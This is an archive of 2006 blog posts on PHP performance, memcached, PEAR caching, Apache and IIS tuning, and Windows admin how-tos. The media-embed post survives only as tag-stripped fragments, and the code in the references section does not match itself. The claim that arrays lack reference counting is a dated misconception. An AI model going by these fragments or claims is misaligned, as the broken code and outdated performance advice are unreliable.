whenpenguinsattack.com

Tuesday, January 31, 2006

using memcached and php

What is memcached?

memcached is a high-performance, distributed memory object caching system, generic in nature, but intended for use in speeding up dynamic web applications by alleviating database load.

Danga Interactive developed memcached to enhance the speed of LiveJournal.com, a site which was already doing 20 million+ dynamic page views per day for 1 million users with a bunch of webservers and a bunch of database servers. memcached dropped the database load to almost nothing, yielding faster page load times for users, better resource utilization, and faster access to the databases on a memcache miss.

How it Works

First, you start up the memcached daemon on as many spare machines as you have. The daemon has no configuration file, just a few command line options, only 3 or 4 of which you'll likely use: # ./memcached -d -m 2048 -l 10.0.0.40 -p 11211

This starts memcached up as a daemon, using 2GB of memory, and listening on IP 10.0.0.40, port 11211. Because a 32-bit process can only address 4GB of virtual memory (usually significantly less, depending on your operating system), if you have a 32-bit server with 4-64GB of memory using PAE you can just run multiple processes on the machine, each using 2 or 3GB of memory.

Shouldn't the database do this?

Regardless of what database you use (MS-SQL, Oracle, Postgres, MysQL-InnoDB, etc..), there's a lot of overhead in implementing ACID properties in a RDBMS, especially when disks are involved, which means queries are going to block. For databases that aren't ACID-compliant (like MySQL-MyISAM), that overhead doesn't exist, but reading threads block on the writing threads.

What about shared memory?

The first thing people generally do is cache things within their web processes. But this means your cache is duplicated multiple times, once for each mod_perl/PHP/etc thread. This is a waste of memory and you'll get low cache hit rates. If you're using a multi-threaded language or a shared memory API (IPC::Shareable, etc), you can have a global cache for all threads, but it's per-machine. It doesn't scale to multiple machines. Once you have 20 webservers, those 20 independent caches start to look just as silly as when you had 20 threads with their own caches on a single box. (plus, shared memory is typically laden with limitations)

The memcached server and clients work together to implement one global cache across as many machines as you have. In fact, it's recommended you run both web nodes (which are typically memory-lite and CPU-hungry) and memcached processes (which are memory-hungry and CPU-lite) on the same machines. This way you'll save network ports.

What about MySQL 4.x query caching?

MySQL query caching is less than ideal, for a number of reasons:

MySQL's query cache destroys the entire cache for a given table whenever that table is changed. On a high-traffic site with updates happening many times per second, this makes the the cache practically worthless. In fact, it's often harmful to have it on, since there's a overhead to maintain the cache.

On 32-bit architectures, the entire server (including the query cache) is limited to a 4 GB virtual address space. memcached lets you run as many processes as you want, so you have no limit on memory cache size.

MySQL has a query cache, not an object cache. If your objects require extra expensive construction after the data retrieval step, MySQL's query cache can't help you there.
If the data you need to cache is small and you do infrequent updates, MySQL's query caching should work for you. If not, use memcached.

What about database replication?

You can spread your reads with replication, and that helps a lot, but you can't spread writes (they have to process on all machines) and they'll eventually consume all your resources. You'll find yourself adding replicated slaves at an ever-increasing rate to make up for the diminishing returns each addition slave provides.

The next logical step is to horizontally partition your dataset onto different master/slave clusters so you can spread your writes, and then teach your application to connect to the correct cluster depending on the data it needs.

While this strategy works, and is recommended, more databases (each with a bunch of disks) statistically leads to more frequent hardware failures, which are annoying.
With memcached you can reduce your database reads to a mere fraction, leaving the databases to mainly do infrequent writes, and end up getting much more bang for your buck, since your databases won't be blocking themselves doing ACID bookkeeping or waiting on writing threads.

Is memcached fast?

Very fast. It uses libevent to scale to any number of open connections (using epoll on Linux, if available at runtime), uses non-blocking network I/O, refcounts internal objects (so objects can be in multiple states to multiple clients), and uses its own slab allocator and hash table so virtual memory never gets externally fragmented and allocations are guaranteed O(1).

What about race conditions?

You might wonder: "What if the get_foo() function adds a stale version of the Foo object to the cache right as/after the user updates their Foo object via update_foo()?"
While the server and API only have one way to get data from the cache, there exists 3 ways to put data in:

set -- unconditionally sets a given key with a given value (update_foo() should use this)
add -- adds to the cache, only if it doesn't already exist (get_foo() should use this)
replace -- sets in the cache only if the key already exists (not as useful, only for completeness)Additionally, all three support an expiration time.

server can be downloaded here: http://www.danga.com/memcached/dist/memcached-1.1.12.tar.gz

php module can be downloaded here: http://pecl.php.net/package/memcache

php optimization myths

Some optimizations are useful. Others are a waste of time - sometimes the improvement is neglible, and sometimes the PHP internals change, rendering the tweak obsolete.
Here are some common PHP legends:

a. echo is faster than print
Echo is supposed to be faster because it doesn't return a value while print does. From my benchmarks with PHP 4.3, the difference is neglible. And under some situations, print is faster than echo (when ob_start is enabled).
b. strip off comments to speed up code
If you use an opcode cache, comments are already ignored. This is a myth from PHP3 days, when each line of PHP was interpreted in run-time.
c. 'var='.$var is faster than "var=$var"
This used to be true in PHP 4.2 and earlier. This was fixed in PHP 4.3. Note (22 June 2004): apparently the 4.3 fix reduced the overhead, but not completely. However I find the performance difference to be negligible.
Do References Speed Your Code?
References do not provide any performance benefits for strings, integers and other basic data types. For example, consider the following code:

function TestRef(&$a)
{
$b = $a;
$c = $a;
}
$one = 1;

ProcessArrayRef($one);
And the same code without references:
function TestNoRef($a)
{
$b = $a;
$c = $a;
}
$one = 1;

ProcessArrayNoRef($one);

PHP does not actually create duplicate variables when "pass by value" is used, but uses high
speed reference counting internally. So in TestRef(), $b and $c take longer to set because the references have to be tracked, while in TestNoRef(), $b and $c just point to the original value of $a, and the reference counter is incremented. So TestNoRef() will execute faster than TestRef().
In contrast, functions that accept array and object parameters have a performance advantage when references are used. This is because arrays and objects do not use reference counting, so multiple copies of an array or object are created if "pass by value" is used. So the following code:

function ObjRef(&$o)
{
$a =$o-&gtname;
}
is faster than:
$function ObjRef($o)
{
$a = $o->name;
}

Note: In PHP 5, all objects are passed by reference automatically, without the need of an explicit & in the parameter list. PHP 5 object performance should be significantly faster.

Monday, January 30, 2006

Optimizing Object-oriented PHP

1. Initialise all variables before use.

2. Dereference all global/property variables that are frequently used in a method and put the values in local variables if you plan to access the value more than twice.

3. Try placing frequently used methods in the derived classes.

Warning: as PHP is going through a continuous improvement process, things might change in the future.

More Details

I have found that calling object methods (functions defined in a class) are about twice as slow as a normal function calls. To me that's quite acceptable and comparable to other OOP languages.

Inside a method (the following ratios are approximate only):

1. Incrementing a local variable in a method is the fastest. Nearly the same as calling a local variable in a function.
2. Incrementing a global variable is 2 times slow than a local var.
3. Incrementing a object property (eg. $this->prop++) is 3 times slower than a local variable.
4. Incrementing an undefined local variable is 9-10 times slower than a pre-initialized one.
5. Just declaring a global variable without using it in a function also slows things down (by about the same amount as incrementing a local var). PHP probably does a check to see if the global exists.
6. Method invocation appears to be independent of the number of methods defined in the class because I added 10 more methods to the test class (before and after the test method) with no change in performance.
7. Methods in derived classes run faster than ones defined in the base class.
8. A function call with one parameter and an empty function body takes about the same time as doing 7-8 $localvar++ operations. A similar method call is of course about 15 $localvar++ operations.

Using PEAR cache

The PEAR Cache is a set of caching classes that allows you to cache multiple types of data, including HTML and images.

The most common use of the PEAR Cache is to cache HTML text. To do this, we use the Output buffering class which caches all text printed or echoed between the start() and end() functions:

require_once("Cache/Output.php");

$cache = new Cache_Output("file", array("cache_dir" => "cache/") );

if ($contents = $cache->start(md5("this is a unique key!"))) {

#
# aha, cached data returned
#

print $contents;
print "<p>Cache Hit</p>";

} else {

#
# no cached data, or cache expired
#

print "<p>Don't leave home without it…</p>"; # place in cache
print "<p>Stand and deliver</p>"; # place in cache
print $cache->end(10);

}

The Cache constructor takes the storage driver to use as the first parameter. File, database and shared memory storage drivers are available; see the pear/Cache/Container directory. Benchmarks by Ulf Wendel suggest that the "file" storage driver offers the best performance. The second parameter is the storage driver options. The options are "cache_dir", the location of the caching directory, and "filename_prefix", which is the prefix to use for all cached files. Strangely enough, cache expiry times are not set in the options parameter.

To cache some data, you generate a unique id for the cached data using a key. In the above example, we used md5("this is a unique key!").

The start() function uses the key to find a cached copy of the contents. If the contents are not cached, an empty string is returned by start(), and all future echo() and print() statements will be buffered in the output cache, until end() is called.

The end() function returns the contents of the buffer, and ends output buffering. The end() function takes as its first parameter the expiry time of the cache. This parameter can be the seconds to cache the data, or a Unix integer timestamp giving the date and time to expire the data, or zero to default to 24 hours.

Another way to use the PEAR cache is to store variables or other data. To do so, you can use the base Cache class:

<?php

require_once("Cache.php");

$cache = new Cache("file", array("cache_dir" => "cache/") );
$id = $cache->generateID("this is a unique key");

if ($data = $cache->get($id)) {

print "Cache hit.<br>Data: $data";

} else {

$data = "The quality of mercy is not strained...";
$cache->save($id, $data, $expires = 60);
print "Cache miss.<br>";

}

?>

To save the data we use save(). If your unique key is already a legal file name, you can bypass the generateID() step. Objects and arrays can be saved because save() will serialize the data for you. The last parameter controls when the data expires; this can be the seconds to cache the data, or a Unix integer timestamp giving the date and time to expire the data, or zero to use the default of 24 hours. To retrieve the cached data we use get().

You can delete a cached data item using $cache->delete($id) and remove all cached items using $cache->flush().

New: A faster Caching class is Cache-Lite. Highly recommended.

Sunday, January 29, 2006

How to install php 4.4.1 on iis 6.0 - updated

Earlier this month, I wrote a howto on how to install php 4.4.1 on iis 6.0. I have a small change in those instructions.

As I have recently discovered (I'm not sure why I never saw this before), if you set the doc_root=your web directory, IIS will not be able to see a php file in any of your subdirectories.

This value doesn't even need to be set at all.

so, rather than setting the doc_root to your web root directory, don't even bother settting it, unless you know what you are doing.

The php zend engine

The Zend Engine is the internal compiler and runtime engine used by PHP4. Developed by Zeev Suraski and Andi Gutmans, the Zend Engine is an abbreviation of their names. In the early days of PHP4, it worked as follows:



The PHP script was loaded by the Zend Engine and compiled into Zend opcode. Opcodes, short for operation codes, are low level binary instructions. Then the opcode was executed and the HTML generated sent to the client. The opcode was flushed from memory after execution.

Today, there are a multitude of products and techniques to help you speed up this process. In the following diagram, we show the how modern PHP scripts work; all the shaded boxes are optional.



PHP Scripts are loaded into memory and compiled into Zend opcodes.

Friday, January 27, 2006

How to play a movie on your website

The following html code will allow you to play flash,quicktime,real meadia, or microsoft media files from your webpage.

Flash:






codebase=
'http://download.macromedia.com/pub/shockwave/cabs
/flash/swflash.cab#version=6,0,0,0'
width="320" height="240">




height="240" loop="true" type='application/x-shockwave-flash'
pluginspage='http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash'>





Quicktime:






height="255" codebase='http://www.apple.com/qtactivex/qtplugin.cab'>




controller="true" loop="true" pluginspage='http://www.apple.com/quicktime/download/'>




REAL:













width="320" height="240">





loop="true" type='audio/x-pn-realaudio-plugin' controls='imagewindow' console='video' autostart="true">



width="320" height='30'>




controls='ControlPanel' type='audio/x-pn-realaudio-plugin' console='video' autostart="true">



Launch in external player




Microsoft media:








classid='CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95'
codebase='
http://activex.microsoft.com/activex/controls
/mplayer/en/nsmp2inf.cab#Version=5,1,52,701'
standby='Loading Microsoft Windows Media Player components...' type='application/x-oleobject'>






pluginspage='http://microsoft.com/windows/mediaplayer/en/download/'
id='mediaPlayer' name='mediaPlayer' displaysize='4' autosize='-1'
bgcolor='darkblue' showcontrols="true" showtracker='-1'
showdisplay='0' showstatusbar='-1' videoborder3d='-1' width="320" height="285"
src="http://yourpage/yourmovie" autostart="true" designtimesp='5311' loop="false">



Launch in external player

Wednesday, January 25, 2006

Launching a process from php

I have written a couple of simple functions that will allow you to launch a separate process from php. This comes in handy, because it can be called from the command line or through a web page. The initial calling script will not halt and will come back immediately.

code can be downloaded Here

Tuesday, January 24, 2006

improving php performance on apache

Apache is available on both Unix and Windows. It is the most popular web server in the world. Apache 1.3 uses a pre-forking model for web serving. When Apache starts up, it creates multiple child processes that handle HTTP requests. The initial parent process acts like a guardian angel, making sure that all the child processes are working properly and coordinating everything. As more HTTP requests come in, more child processes are spawned to process them. As the HTTP requests slow down, the parent will kill the idle child processes, freeing up resources for other processes. The beauty of this scheme is that it makes Apache extremely robust. Even if a child process crashes, the parent and the other child processes are insulated from the crashing child.
The pre-forking model is not as fast as some other possible designs, but to me that it is "much ado about nothing" on a server serving PHP scripts because other bottlenecks will kick in long before Apache performance issues become significant. The robustness and reliability of Apache is more important.

Apache 2.0 offers operation in multi-threaded mode. My benchmarks indicate there is little performance advantage in this mode. Also be warned that many PHP extensions are not compatible (e.g. GD and IMAP). Tested with Apache 2.0.47.
Apache is configured using the httpd.conf file. The following parameters are particularly important in configuring child processes:


MaxClients : default: 256
The maximum number of child processes to create. The default means that up to 256 HTTP requests can be handled concurrently. Any further connection requests are queued.

StartServers: default: 5
The number of child processes to create on startup.

MinSpareServers: default:5
The number of idle child processes that should be created. If the number of idle child processes falls to less than this number, 1 child is created initially, then 2 after another second, then 4 after another second, and so forth till 32 children are created per second.

MaxSpareServers: default:10
If more than this number of child processes are alive, then these extra processes will be terminated.

MaxRequestsPerChild: default: 0
Sets the number of HTTP requests a child can handle before terminating. Setting to 0 means never terminate. Set this to a value to between 100 to 10000 if you suspect memory leaks are occurring, or to free under-utilized resources

For large sites, values close to the following might be better:

MinSpareServers 32
MaxSpareServers 64

Apache on Windows behaves differently. Instead of using child processes, Apache uses threads. The above parameters are not used. Instead we have one parameter: ThreadsPerChild which defaults to 50. This parameter sets the number of threads that can be spawned by Apache. As there is only one child process in the Windows version, the default setting of 50 means only 50 concurrent HTTP requests can be handled. For web servers experiencing higher traffic, increase this value to between 256 to 1024.

Other useful performance parameters you can change include:


SendBufferSize: Set to OS default
Determines the size of the output buffer (in bytes) used in TCP/IP connections. This is primarily useful for congested or slow networks when packets need to be buffered; you then set this parameter close to the size of the largest file normally downloaded. One TCP/IP buffer will be created per client connection.

KeepAlive [onoff] default:On
In the original HTTP specification, every HTTP request had to establish a separate connection to the server. To reduce the overhead of frequent connects, the keep-alive header was developed. Keep-alives tells the server to reuse the same socket connection for multiple HTTP requests.

If a separate dedicated web server serves all images, you can disable this option. This technique can substantially improve resource utilization.

KeepAliveTimeout:default:15
The number of seconds to keep the socket connection alive. This time includes the generation of content by the server and acknowledgements by the client. If the client does not respond in time, it must make a new connection.

This value should be kept low as the socket will be idle for extended periods otherwise.

MaxKeepAliveRequests: default:100
Socket connections will be terminated when the number of requests set by MaxKeepAliveRequests is reached. Keep this to a high value below MaxClients or ThreadsPerChild.

TimeOut: default:300
Disconnect when idle time exceeds this value. You can set this value lower if your clients have low latencies.

LimitRequestBody: default:0
Maximum size of a PUT or POST. O means there is no limit.

If you do not require DNS lookups and you are not using the htaccess file to configure Apache settings for individual directories you can set:

# disable DNS lookups: PHP scripts only get the IP address
HostnameLookups off

# disable htaccess checks

<Directory />


AllowOverride none


</Directory>



If you are not worried about the directory security when accessing symbolic links, turn on FollowSymLinks and turn off SymLinksIfOwnerMatch to prevent additional lstat() system calls from being made:

Options FollowSymLinks

#Options SymLinksIfOwnerMatch

Tuning IIS for PHP

IIS is a multi-threaded web server available on Windows NT and 2000. From the Internet Services Manager, it is possible to tune the following parameters:

Performance Tuning based on the number of hits per day: Determines how much memory to preallocate for IIS. (Performance Tab).

Bandwidth throttling: Controls the bandwidth per second allocated per web site. (Performance Tab).

Process throttling: Controls the CPU% available per Web site. (Performance Tab).

Timeout: Default is 900 seconds. Set to a lower value on a Local Area Network. (Web Site Tab).

HTTP Compression: In IIS 6, you can compress dynamic pages, html and images. Can be configured to cache compressed static html and images. By default compression is off.

HTTP compression has to be enabled for the entire physical server. To turn it on open the IIS console, right-click on the server (not any of the subsites, but the server in the left-hand pane), and get Properties. Click on the Service tab, and select "Compress application files" to compress dynamic content, and "Compress static files" to compress static content.

You can also configure the default isolation level of your web site. In the Home Directory tab under Application Protection, you can define your level of isolation. A highly isolated web site will run slower because it is running as a separate process from IIS, while running web site in the IIS process is the fastest but will bring down the server if there are serious bugs in the web site code. Currently I recommend running PHP web sites using CGI, or using ISAPI with Application Protection set to high.

You can also use regedit.exe to modify following IIS 5 registry settings stored at the following location:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Inetinfo\Parameters
MemCacheSize: Sets the amount of memory that IIS will use for its file cache. By default IIS will use 50% of available memory. Increase if IIS is the only application on the server. Value is in megabytes.

MaxCachedFileSize: Determines the maximum size of a file cached in the file cache in bytes. Default is 262,144 (256K).

ObjectCacheTTL: Sets the length of time (in milliseconds) that objects in the cache are held in memory. Default is 30,000 milliseconds (30 seconds).

MaxPoolThreads: Sets the number of pool threads to create per processor. Determines how many CGI applications can run concurrently. Default is 4. Increase this value if you are using PHP in CGI mode.

ListenBackLog: Specifies the maximum number of active Keep Alive connections that IIS maintains in the connection queue. Default is 15, and should be increased to the number of concurrent connections you want to support. Maximum is 250.

If the settings are missing from this registry location, the defaults are being used.

High Performance on Windows: IIS and FastCGI

After much testing, I find that the best PHP performance on Windows is offered by using IIS with FastCGI. CGI is a protocol for calling external programs from a web server. It is not very fast because CGI programs are terminated after every page request. FastCGI modifies this protocol for high performance, by making the CGI program persist after a page request, and reusing the same CGI program when a new page request comes in.

As the installation of FastCGI with IIS is complicated, you should use the EasyWindows PHP Installer. This will install PHP, FastCGI and Turck MMCache for the best performance possible. This installer can also install PHP for Apache 1.3/2.0.

Sunday, January 22, 2006

Five Tips for Freelance PHP Coders

By Elizabeth Naramore

Introduction

If you've decided that working for yourself as a self-employed web developer or PHP coder sounds like your cup of tea, but you feel as if the task is a bit daunting, then listen up. We've put together a list of helpful tips that will enable you to go wherever it is you want your own business to go. You should know that these are in no particular order and we consider them all equally important. As well, please be advised that this is by no means a guarantee to your success, nor is it a comprehensive list of potential obstacles you may encounter.

1. Guard Your Reputation With Your Life

Your reputation is the most important asset you have, and you should treat it as such. You might be the most competent coder on the planet, but if you have a reputation for being difficult to work with, or unreliable, getting new clients will be more difficult, you will lose referrals from current clients and you will find you will have to prove yourself over and over again. Don't make promises you can't keep, and remember that your actions today may have a profound effect on the future success of your business. Maintaining a contract business is difficult enough without you inadvertently sabotaging your own efforts.

2. Be Passionate About Your Work

Clients want to see genuine enthusiasm and they will take comfort in the fact that you have a personal investment in their web site. A larger company may be able to offer the same coding services that you can, but you can use that "personal touch" to your advantage.

3. Be Responsive And Communicate Often

Even if things are crazy or if you are extremely behind schedule, taking five minutes to make a quick change for a client's site or sending a quick e-mail to update your client about the status of his project will really go a long way in diffusing a potentially damaging situation. Of course, this will only buy you a little time, but it is much better than ignoring a client altogether and aggravating the situation.You can also provide status reports for your clients weekly or bi-weekly, so they are kept in the loop as to how things are progressing. Knowing that you will have to be presenting these reports helps you maintain accountability for the project and keep you moving forward, as well as keeping your client informed.Along with this goes the advice of promptly returning phone calls and e-mails. Some of us are averse to using the phone, but by giving your client the courtesy of returning a phone call, you are in essence communicating that you value their business and that you are there to help. Likewise with e-mails, they should be responded to immediately, not three or four days later.

4. Don't Be An Ostrich

When things get overwhelming (and they will), resist the urge to stick your head in the sand and play another game of . This will only exacerbate the situation. If you cannot see the light at the end of the tunnel, get help. Enlist a trusted colleague with a few small pieces of the bigger project. Better yet, enlist several trusted colleagues. Whatever you do, make sure you're doing something to chip away at the workload.

5. Remember That You Are Your Own Ambassador

Tact and diplomacy can be your best friends, especially when a client is asking for the impossible. Unlike coding jobs in the industry, where you have a full staff of sales and marketing and executive types buffering the client from the dungeons of the coders, when you are your own boss, you are thrust onto the surface world and must deal directly with the clients. Try not to be condescending or openly laugh at their ignorance; you will only alienate them and risk losing them as a client (and any referrals they might have passed your way). At least wait until they are no longer within earshot; then mock away

Friday, January 20, 2006

How to override php.ini

This tip is for people running apache and php. I know it works with freebsd version 5.0/php 4.X/apache 2.X. I am not sure about other operating systems/webservers/php versions.

As an example scenario, A client of mine needed a php script that would allow him to upload any type of file to his server. He also wanted the default max of 4 mb to changed to 30mb. His website was being hosted on a shared server, so there was no access to php.ini. Here is how this can be done.

1) Create a file called .htaccess in the same directory as your php script (this will apply to any php script that is in this directory).

2) for each value you want to override, use the following format: php_value php_var_name php_var_value

Example:

php_value memory_limit 34M
php_value post_max_size 33M
php_value upload_max_filesize 32M
php_value max_execution_time 600

Wednesday, January 18, 2006

Nullsoft open source installer (NSIS 2.12) released

What is Nullsoft open source installer and why do I need it?

An installer is the first experience of a user with your application. Slow or unsuccessful software installations are the most irritating computer problems. A quick and user friendly installer is therefore an essential part of your software product.
NSIS (Nullsoft Scriptable Install System) is a tool that allows programmers to create such installers for Windows. It is released under an open source license and is completely free for any use.

NSIS creates installers that are capable of installing, uninstalling, setting system settings, extracting files, etc. Because it's based on script files, you can fully control every part of your installers. The script language supports variables, functions, string manipulation, just like a normal programming language - but designed for the creation of installers. Even with all these features, NSIS is still the smallest installer system available. With the default options, it has an overhead of only 34 KB.

A brief list of companies/applications using this installer:

Winamp (audio player)
SHOUTcast server, plug-ins (music streaming system)
Google (Gmail, Picasa 2, Google Talk, Video)
ATi (just as a wrapper)
DivX (video codec)
Kaspersky (antivirus)
Intel C Compiler (free evaluation version)
City of Heroes (commercial MMORPG game)
Sun Java Web Start
UC Berkeley (computer security CD for campus residents)
Trolltech

The latest version can be downloaded Here
An example install script can be found Here

Tuesday, January 17, 2006

Optimizing PHP - a first look (part one)

By Leon Atkinson

One reason I like PHP is that it allows the freedom to quickly create Web applications without worrying about following all the rules of proper design. When it comes to rapid prototyping, PHP shines. With this power comes the responsibility to write clean code when it's time to write longer-lasting code. Sticking to a style guide helps you write understandable programs, but eventually you will write code that doesn't execute fast enough.

Optimization is the process of fine-tuning a program to increase speed or reduce memory usage. Memory usage is not as important as it once was, because memory is relatively inexpensive. However, shorter execution times are always desirable.

There are many tips for writing efficient programs, and I can hardly discuss them all here. And anyway, that would be like giving you a fish instead of teaching you to catch your own. This month, I will review the techniques I use for speeding up my PHP scripts.

When to optimize


Before you write a program, commit yourself to writing clearly at the expense of performance. Follow coding conventions, such as using mysql_fetch_row instead of mysql_result. But keep in mind that programming time is expensive, especially when programmers must struggle to understand code. The simplest solution is usually best.

When you finish a program, consider whether its performance is adequate. If your project benefits from a formal requirements specification, refer to any performance constraints. It's not unusual to include maximum page load times for Web applications. Many factors affect the time between clicking a link and viewing a complete page. Be sure to eliminate factors you cannot control, such as the speed of the network.

If you determine that your program needs optimization, consider upgrading the hardware first. This may be the least expensive alternative. In 1965, Gordon Moore observed that computing power doubled every 18 months. It's called Moore's Law. Despite the steep increase in power, the cost of computing power drops with time. For example, despite CPU clock speeds doubling, their cost remains relatively stable. Upgrading your server is likely less expensive than hiring programmers to optimize the code.

After upgrading hardware, consider upgrading the software supporting your program. Start with the operating system. Linux and BSD Unix have the reputation of squeezing more performance out of older hardware, and they may outperform commercial operating systems, especially if you factor in server crashes.

If your program uses a database, consider the differences between relational databases. If you can do without stored procedures and sub-queries, MySQL may offer a significant performance enhancement over other database servers. Check out the benchmarks provided on their Web site. Also, consider giving your database server more memory.

Two Zend products can help speed execution times of PHP programs. The first is the Zend Optimizer. This optimizes PHP code as it passes through the Zend Engine. It can run PHP programs 40% to 100% faster than without it. Like PHP, the Zend Optimizer is free. The next product to consider is the Zend Cache. It provides even more performance over the optimizer by keeping compiled code in memory. Some users have experienced 300% improvements. Contact Zend to purchase the Zend Cache.

Measuring performance

Before you can begin optimizing, you must be able to measure performance. The two tools I'll discuss are inserting HTML comments and using Apache's ApacheBench utility. PHP applications run on a Web server, but the overhead added by serving HTML documents over a network should be factored out of your measurements.

You need to isolate the server from other activity, perhaps by barring other users or even disconnecting it from the network. Running tests on a server that's providing a public site may give varying results, as traffic changes during the day. Run your tests on a dedicated server even if the hardware doesn't match the production server. Optimizations made on slower hardware should translate into relative gains when put into production.

The easiest method you can use is insertion of HTML comments into your script's output. This method adds to the overall weight of the page, but it doesn't disturb the display. I usually print the output of the microtime function. I insert a line like:

I place these calls to microtime at the beginning, end and at key points inside my script. To measure performance, I request the page in a Web browser and view the source.

The microtime function returns the number of seconds on the clock. The first figure is a fraction of seconds, and the other is the number of seconds since January 1, 1970. You can add the two numbers and put them in an array, but I prefer to minimize the affect on performance by doing the calculation outside of the script. In the example above, the first part of the script takes approximately 0.005 seconds, and the second part takes 0.03.

If you decide to calculate time differences, consider the method used in the example below. Entries to the clock array contain a one-word description followed by the output of microtime. The explode function breaks up the three values so the script can display a table of timing values. The first column of the table holds the number of seconds elapsed since the last entry.

Inserting HTML comments is my favorite method, because it takes no preparation. But its big weakness is a small sample size. I always try three or four page loads to eliminate any variances due to caching or periodic server tasks.

The Apache Web server includes a program that addresses this problem by measuring the number of requests your server can handle. It's called ApacheBench, but the executable is "ab". ApacheBench makes a number of requests to a given URL and reports on how long it took. Here's an example of running 1000 requests for a plain HTML document:

~> /usr/local/apache/bin/ab -n 1000 http://localhost/test.html

This is ApacheBench, Version 1.3c <$Revision: 1.1.2.6 $> apache-1.3

Copyright (c) 1996 Adam Twiss, Zeus Technology Ltd, http://www.zeustech.net/

Copyright (c) 1998-2000 The Apache Group, http://www.apache.org/

Server Software: Apache/1.3.19

Server Hostname: localhost

Server Port: 80

Document Path: /test.html

Document Length: 6 bytes

Concurrency Level: 1

Time taken for tests: 5.817 seconds

Complete requests: 1000

Failed requests: 0

Total transferred: 262000 bytes

HTML transferred: 6000 bytes

Requests per second: 171.91

Transfer rate: 45.04 kb/s received

Connnection Times (ms)

min avg max

Connect: 1 1 11

Processing: 3 3 16

Total: 4 4 27

I requested an HTML document to get an idea of the baseline performance of my server. Any PHP script ought to be slower than an HTML document. Comparing the figures gives me an idea of the room for improvement. If I found my server could serve a PHP script at 10 requests per second, I'd have a lot of room for improvement.

Keep in mind that I'm running ApacheBench on the server. This eliminates the effects of moving data over the network, but ApacheBench uses some CPU time. I could test from another machine to let the Web server use all the system resources.

By default, ApacheBench makes one connection at a time. If you use 100 for the -n option, it connects to the server one hundred times sequentially. In reality, Web servers handle many requests at once. Use the -c option to set the concurrency level. For example, -n 1000 -c 10 makes one thousand connections with 10 requests active at all times. This usually reduces the number of requests the server can handle, but at low levels the server is waiting for hardware, such as the hard disk.

The ApacheBench program is a good way to measure overall change without inconsistencies, but it can't tell you which parts of a script are slower than others. It also includes the overhead involved with connecting to the server and negotiating for the document using HTTP. You can get around this limitation by altering your script. If you comment out parts and compare performance, you can gain an understanding of which parts are slowest. Alternatively, you may use ApacheBench together with microtime comments.

Whichever method you use, be sure to test with a range of values. If your program uses input from the user, try both the easy cases and the difficult ones, but concentrate on the common cases. For example, when testing a program that analyzes text from a textarea tag, don't limit yourself to typing a few words into the form. Enter realistic data, including large values, but don't bother with values so large they fall out of normal usage. People rarely type a megabyte of text into a textarea, so if performance drops off sharply, it's probably not worth worrying about.

Remember to measure again after each change to your program, and stop when you achieve your goal. If a change reduces performance, return to an earlier version. Let your measurements justify your changes.

Attacking the slowest parts

Although there are other motivations, such as personal satisfaction, most people optimize a program to save money. Don't lose sight of this as you spend time increasing the performance of your programs. There's no sense in spending more time optimizing than the optimization itself saves. Optimizing an application used by many people is usually worth the time, especially if you benefit from licensing fees. It's hard to judge the value of an open-source application you optimize, but I find work on open-source projects satisfying as recreation.

To make the most of your time, try to optimize the slowest parts of your program where you stand to gain the most. Generally, you should try to improve algorithms by finding faster alternatives. Computer scientists use a special notation to describe the relative efficiency of an algorithm called big-O notation. An algorithm that must examine each input datum once is O(n). An algorithm that must examine each element twice is still called O(n) as linear factors are not interesting. A really slow algorithm might be O(n^2), or O of n-squared. A really fast algorithm might be O(n log n), or n times the logarithm of n. This subject is far too complex to cover here -- you will find lots of information on the Internet and in university courses. Understanding it may help you choose faster algorithms.

Permanent storage, such as a hard disk, is much slower to use than volatile storage, such as RAM. Operating systems compensate somewhat by caching disk blocks to system memory, but you can't keep your entire system in RAM. Parts of your program that use permanent storage are good candidates for optimization.

If you are using data stored in files, consider using a relational database instead. Database servers can do a better job of caching data than the operating system because they view the data with a finer granularity. Database servers may also cache open files, saving you the overhead in opening and closing files.

Alternatively, you can try caching data within your own program, but consider the lifecycle of a PHP script. At the end of the request, PHP frees all memory. If during your program you need to refer to the same file many times, you may increase performance by reading the file into a variable.

Consider optimizing your database queries, too. MySQL includes the EXPLAIN statement, which returns information about how the join engine uses indexes. MySQL's online manual includes information about the process of optimizing queries.

Here are two tips for loops. If the number of iterations in a loop is low, you might get some performance gain from replacing the loop with a number of statements. For example, consider a for loop that sets 10 values in an array. You can replace the loop with 10 statements, which is a duplication of code, but may execute slightly faster.

Also, don't recompute values inside a loop. Before the foreach statement appeared in PHP.

Function calls carry a high overhead. You can get a bump in performance if you eliminate a function. Compiled languages, such as C and Java, have the luxury of replacing function calls with inline code. You should avoid functions that you only call once. One technique for readable code is to use functions to hide details. This technique is expensive in PHP.

If all else fails, you have the option of moving part of your code into C, wrapping it in a PHP function. This technique is not for the novice, but many of PHP's functions began as optimizations. Consider the in_array function. You can test for the presence of the value in an array by looping through it, but the function written in C is much faster.

Monday, January 16, 2006

How to backup and restore outlook express 6.0

This works with outlook express 6.0 on any platform (I have used it on windows XP,2003, and 98).

Backing up your email


Open Outlook Express

A) Backup accounts

1) goto tools->accounts
2) click on the mail tab
3) any account that is there, click on "export" and save these files to your harddrive

B) Backup emails

1) find your store folder by going to tools->options->maintenance and clicking on "store folder"
2) backup this entire folder to a separate location

Any message rule will need to be backed up by hand.

Restoring your email

Open Outlook Express on the target computer

A) restoring accounts

1) goto tools->accounts
2) click on the mail tab
3) click on "import" and import each file that you expored from the above steps.

B) Restore folders

1) look at the backup folder from above, and create new folders with the same name as any dbx file that is there (IE: if there is a file called my_email.dbx, make a folder called my_email)

C) Restore all email

1) get the store folder using part b step 1 from above
2) close outlook express
3) copy all backup data to your new store folder from part 1
4) open outlook express and it should be an exact copy of the mailbox that was backed up.

Sunday, January 15, 2006

How to make an exchange auto-install CD

By: Daniel Petri

You can configure Exchange 2000/2003 to install without having to manually enter the CD key during the setup process.

First, you should copy your Exchange 2000/2003 setup files from your CD to your hard drive.

Find a file called Setup.sdb (which is found in the \SETUP\I386 subfolder). Right click the file, select Properties, and remove the Read-only checkmark. Now open the file to edit it.

Look inside your Setup.sdb file for a section called

[Product Information]
In that section, look for a line beginning with:
DefaultPid30=
If you cannot find such a line, insert a new empty line somewhere in that section, and paste the new value in the following format:
DefaultPid30=ABCDE-FGHIJ-KLMNO-PQRST-UVWXY

note: Use your own CD key, the above string is just an example!

Save the file, burn the whole folder that contains the installation files to a CD.
